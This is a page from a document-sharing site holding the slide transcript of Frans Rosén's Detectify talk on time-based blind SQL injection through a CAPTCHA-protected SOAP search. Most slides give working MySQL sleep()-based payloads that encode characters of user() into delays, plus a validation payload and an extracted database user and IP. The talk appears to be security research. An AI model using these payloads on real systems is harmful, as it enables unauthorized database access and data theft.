Time based CAPTCHA protected SQL injection through SOAP-webservice

of 17

Please download to get full document.

View again

All materials on our website are shared by users. If you have any questions about copyright issues, please report us to resolve them. We are always happy to assist you.
PDF
17 pages
0 downs
37 views
Share
Description
1. detectify Time based captcha protected SQL injection through SOAP-webservice Frans Rosén @fransrosen 2. detectify Search + CAPTCHA 3. detectify Search for Bobby:…
Transcript
  • 1. detectify Time based captcha protected SQL injection through SOAP-webservice Frans Rosén @fransrosen
  • 2. detectify Search + CAPTCHA
  • 3. detectify Search for Bobby: '
  • 4. detectify Search: '-sleep(5)-'
  • 5. detectify CAPTCHA… https://twitter.com/offensive_image/status/751191306500734976
  • 6. detectify Me need 1. Do a clear PoC – get data 2. As few requests as possible 3. Find ALL the store fronts! 4. ??? 5. PROFIT!!!
  • 7. detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-'
  • 8. detectify user() '-sleep((ascii(substring(user(), 1, 1)) - 90) / 2)-' (14*2) + 90 = 118 == v
  • 9. detectify Validate '-(if(ascii(substring(user(), 1, 1)) = 117, sleep(3),1))- (if(ascii(substring(user(), 1, 1)) = 118, sleep(6),1))- (if(ascii(substring(user(), 1, 1)) = 119, sleep(9),1))-' === v
  • 10. detectify Down on the @ '-sleep((ascii(substring(user(), 21, 1)) - 90) / 2)-'
  • 11. detectify Host search '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  • 12. detectify Host search 0s for a dot (T - 4) / 2 = 2 '-sleep((ascii(substring(user(), 21, 1)) - 46) * 2)-'
  • 13. detectify Setup
  • 14. detectify Result rawskuiumsal@192.251.68.254
  • 15. detectify Result
  • 16. detectify Other https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf SQL Injection Optimization and Obfuscation Techniques
  • 17. detectify Thanks! Frans Rosén (@fransrosen) – www.detectify.com
  • Related Search
    We Need Your Support
    Thank you for visiting our website and your interest in our free products and services. We are nonprofit website to share and download documents. To the running of this website, we need your help to support us.

    Thanks to everyone for your continued support.

    No, Thanks